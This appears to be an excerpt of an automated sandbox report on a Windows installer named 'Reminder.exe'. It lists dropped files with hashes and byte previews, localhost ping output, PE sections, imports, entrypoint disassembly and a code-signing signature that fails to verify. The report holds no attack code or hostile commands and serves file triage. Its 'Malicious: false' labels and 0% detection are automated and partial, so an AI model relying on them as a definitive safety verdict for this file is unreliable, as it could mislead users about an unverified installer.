        Size (bytes): 0
        Entropy (8bit): 0.0
        Encrypted: false
        SSDEEP:
        MD5: 3F58A517F1F4796225137E7659AD2ADB
        SHA1: E264BA0E9987B0AD0812E5DD4DD3075531CFE269
        SHA-256: 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
        SHA-512: ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
        Malicious: false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation: unknown
        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: data
        Category: dropped
        Size (bytes): 0
        Entropy (8bit): 0.0
        Encrypted: false
        SSDEEP:
        MD5: 70AE9B8A733EAA5A6AC51F701F86F73D
        SHA1: 13154932B86947EFCDDD92F552E15AEC5316B2CE
        SHA-256: 151EC6640A046099F9FF5CC3A19001ACBC2D1C4CC8BD8C8BB43BA598CCAC6681
        SHA-512: 4AED1C6EA245AD4DFAA90253DCFC1D8FB2AD965C241F91D84FBC315D994B73BFC7F225E30E4019887B116D57A17330A1C1E994E5E6332AE66A68A3AD8BDB33B6
        Malicious: false
        Reputation: unknown
        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o..K.,.qn...D..............#.....J.#.....JkC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~...bk..)....Vq.#..c9|J.#....Jm.....T,....5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: data
        Category: dropped
        Size (bytes): 0
        Entropy (8bit): 0.0
        Encrypted: false
        SSDEEP:
        MD5: 356418D32F4117C84B577BE53DC1BBF2
        SHA1: D09CF166E6D90A9B5BFB74B8297833A5E69E00F6
        SHA-256: 0D8586DA0418EAD69F96ECC3A19BF61AF9A6F8BCC42602E0D6F00F80C5E6CAA1
        SHA-512: 1EE6F6315C8F0E9EB2E93BDCB14661F506279285148396D2A863073B796EE2A99B5F74C9A0329FE35B6B72C624F80FACCA630ED63BAEB77BA94EAE93B12E3A40
        Malicious: false
        Reputation: unknown
        Preview:B;k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B;k.....................................
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: PE32 executable (GUI) Intel 80386, for MS Windows
        Category: dropped
        Size (bytes): 943784
        Entropy (8bit): 6.621472142472864
        Encrypted: false
        SSDEEP:
        MD5: 3F58A517F1F4796225137E7659AD2ADB
        SHA1: E264BA0E9987B0AD0812E5DD4DD3075531CFE269
        SHA-256: 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
        SHA-512: ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
        Malicious: false
        Reputation: unknown
        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: data
        Category: dropped
        Size (bytes): 61106
        Entropy (8bit): 7.997065387988865
        Encrypted: true
        SSDEEP:
        MD5: 70AE9B8A733EAA5A6AC51F701F86F73D
        SHA1: 13154932B86947EFCDDD92F552E15AEC5316B2CE
        SHA-256: 151EC6640A046099F9FF5CC3A19001ACBC2D1C4CC8BD8C8BB43BA598CCAC6681
        SHA-512: 4AED1C6EA245AD4DFAA90253DCFC1D8FB2AD965C241F91D84FBC315D994B73BFC7F225E30E4019887B116D57A17330A1C1E994E5E6332AE66A68A3AD8BDB33B6
        Malicious: false
        Reputation: unknown
        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o..K.,.qn...D..............#.....J.#.....JkC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~...bk..)....Vq.#..c9|J.#....Jm.....T,....5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.
        Process: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
        File Type: data
        Category: dropped
        Size (bytes): 737665
        Entropy (8bit): 6.4607709946359995
        Encrypted: false
        SSDEEP:
        MD5: 356418D32F4117C84B577BE53DC1BBF2
        SHA1: D09CF166E6D90A9B5BFB74B8297833A5E69E00F6
        SHA-256: 0D8586DA0418EAD69F96ECC3A19BF61AF9A6F8BCC42602E0D6F00F80C5E6CAA1
        SHA-512: 1EE6F6315C8F0E9EB2E93BDCB14661F506279285148396D2A863073B796EE2A99B5F74C9A0329FE35B6B72C624F80FACCA630ED63BAEB77BA94EAE93B12E3A40
        Malicious: false
        Reputation: unknown
        Preview:B;k...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B;k.....................................
        Process: C:\Windows\SysWOW64\PING.EXE
        File Type: ASCII text, with CRLF line terminators
        Category: dropped
        Size (bytes): 478
        Entropy (8bit): 4.9404427828211634
        Encrypted: false
        SSDEEP:
        MD5: 1D785D889CA617298A68D26DFEF974C4
        SHA1: 1CC36474033E2767B059019B12782CE558F1EA34
        SHA-256: FE52FE8317F9F07F4AB830F6E3B1F1013BE4AA2A82DD5C86AA805648FC053230
        SHA-512: EF34C2479BE5BA45B41584887354DE53EA15EC53EA74D57042FF57EB8A609B93DAC9A55297300C29320CE14966FB7704C9952BDC7C6E2DDD0DCA929884091CF3
        Malicious: false
        Reputation: unknown
        Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
        Static File Info

        File type: PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit): 7.965829564509541
        TrID:
        • Win32 Executable (generic) a (10002005/4) 98.19%
        • Inno Setup installer (109748/4) 1.08%
        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
        • Win16/32 Executable Delphi generic (2074/23) 0.02%
        File name: Reminder.exe
        File size: 10'161'880 bytes
        MD5: d743bb6502147d38addb430590bc7a98
        SHA1: 16cd70dd31fc54c0e42695441dbf3eab5de2e2bd
        SHA256: ebe565a1a2b13e3cbcf7bcc58ea8bee81bd1ed2fed0e5977dc9e108ee8cbae95
        SHA512: b6b61e445e59f3431414a8c664ed5686d79cb01fd50e7442c869f6c94f4f4183f980de2827f1ddf70817a4dd08661281e1d050ace81c5c5b50b7dbf7a073a735
        SSDEEP: 196608:F/UI+mNZKDKmDX7HPY58yZqLcbUm4CzknrnbELh19M8pjx6gO0EMTe:F8HV7YqyZqLwqqk3E39npjZO0Eme
        TLSH: 72A62322B3C7E43EE06D0B3706B3B65859FBAB51A922BE5396E484ACCF150501D3E357
        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
        Icon Hash: 6c6aeee6c14cdc4c
        Entrypoint: 0x4a83bc
        Entrypoint Section: .itext
        Digitally signed: true
        Imagebase: 0x400000
        Subsystem: windows gui
        Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp: 0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major: 6
        OS Version Minor: 1
        File Version Major: 6
        File Version Minor: 1
        Subsystem Version Major: 6
        Subsystem Version Minor: 1
        Import Hash: 40ab50289f7ef5fae60801f88d4541fc
        Signature Valid: false
        Signature Issuer: CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
        Signature Validation Error: The digital signature of the object did not verify
        Error Number: -2146869232
        Not Before: 24/06/2022 09:22:08
        Not After: 14/04/2025 16:06:58
        Subject Chain:
        • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
        Version: 3
        Thumbprint MD5: 648FDCF28A095B6DA4C31C9D5CD35A64
        Thumbprint SHA-1: 8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
        Thumbprint SHA-256: 20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
        Serial: 115BBE9E1C286827AF66E7A01390C206
        Entrypoint Instructions
        push ebp
        mov ebp, esp
        add esp, FFFFFFA4h
        push ebx
        push esi
        push edi
        xor eax, eax
        mov dword ptr [ebp-3Ch], eax
        mov dword ptr [ebp-40h], eax
        mov dword ptr [ebp-5Ch], eax
        mov dword ptr [ebp-30h], eax
        mov dword ptr [ebp-38h], eax
        mov dword ptr [ebp-34h], eax
        mov dword ptr [ebp-2Ch], eax
        mov dword ptr [ebp-28h], eax
        mov dword ptr [ebp-14h], eax
        mov eax, 004A2EBCh
        call 00007FC2E44B1CF5h
        xor eax, eax
        push ebp
        push 004A8AC1h
        push dword ptr fs:[eax]
        mov dword ptr fs:[eax], esp
        xor edx, edx
        push ebp
        push 004A8A7Bh
        push dword ptr fs:[edx]
        mov dword ptr fs:[edx], esp
        mov eax, dword ptr [004B0634h]
        call 00007FC2E454367Bh
        call 00007FC2E45431CEh
        lea edx, dword ptr [ebp-14h]
        xor eax, eax
        call 00007FC2E453DEA8h
        mov edx, dword ptr [ebp-14h]
        mov eax, 004B41F4h
        call 00007FC2E44ABDA3h
        push 00000002h
        push 00000000h
        push 00000001h
        mov ecx, dword ptr [004B41F4h]
        mov dl, 01h
        mov eax, dword ptr [0049CD14h]
        call 00007FC2E453F1D3h
        mov dword ptr [004B41F8h], eax
        xor edx, edx
        push ebp
        push 004A8A27h
        push dword ptr fs:[edx]
        mov dword ptr fs:[edx], esp
        call 00007FC2E4543703h
        mov dword ptr [004B4200h], eax
        mov eax, dword ptr [004B4200h]
        cmp dword ptr [eax+0Ch], 01h
        jne 00007FC2E454A3EAh
        mov eax, dword ptr [004B4200h]
        mov edx, 00000028h
        call 00007FC2E453FAC8h
        mov edx, dword ptr [004B4200h]
        Data Directories
        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0xe610 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9aea00 | 0x24d8 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        .rsrc | 0xcb000 | 0xe610 | 0xe800 | 5f36adece46ffbc3b5e8abb618d8b9be | False | 0.6631869612068966 | data | 6.853948165376388 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
        RT_ICON | 0xcb4c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.599290780141844
        RT_ICON | 0xcb930 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.38410746812386154
        RT_ICON | 0xcca58 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.29302278275020344
        RT_ICON | 0xcf0c0 | 0x7407 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9937716728949938
        RT_STRING | 0xd64c8 | 0x3f8 | data | | | 0.3198818897637795
        RT_STRING | 0xd68c0 | 0x2dc | data | | | 0.36475409836065575
        RT_STRING | 0xd6b9c | 0x430 | data | | | 0.40578358208955223
        RT_STRING | 0xd6fcc | 0x44c | data | | | 0.38636363636363635
        RT_STRING | 0xd7418 | 0x2d4 | data | | | 0.39226519337016574
        RT_STRING | 0xd76ec | 0xb8 | data | | | 0.6467391304347826
        RT_STRING | 0xd77a4 | 0x9c | data | | | 0.6410256410256411
        RT_STRING | 0xd7840 | 0x374 | data | | | 0.4230769230769231
        RT_STRING | 0xd7bb4 | 0x398 | data | | | 0.3358695652173913
        RT_STRING | 0xd7f4c | 0x368 | data | | | 0.3795871559633027
        RT_STRING | 0xd82b4 | 0x2a4 | data | | | 0.4275147928994083
        RT_RCDATA | 0xd8558 | 0x10 | data | | | 1.5
        RT_RCDATA | 0xd8568 | 0x310 | data | | | 0.6173469387755102
        RT_RCDATA | 0xd8878 | 0x2c | data | | | 1.2045454545454546
        RT_GROUP_ICON | 0xd88a4 | 0x3e | data | English | United States | 0.8709677419354839
        RT_VERSION | 0xd88e4 | 0x584 | data | English | United States | 0.28895184135977336
        RT_MANIFEST | 0xd8e68 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
        DLL | Import
        kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
        comctl32.dll | InitCommonControls
        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
        advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
        Name | Ordinal | Address
        __dbk_fcall_wrapper | 2 | 0x40fc10
        dbkFCallWrapperAddr | 1 | 0x4b063c
        Language of compilation system | Country where language is spoken | Map
        English | United States |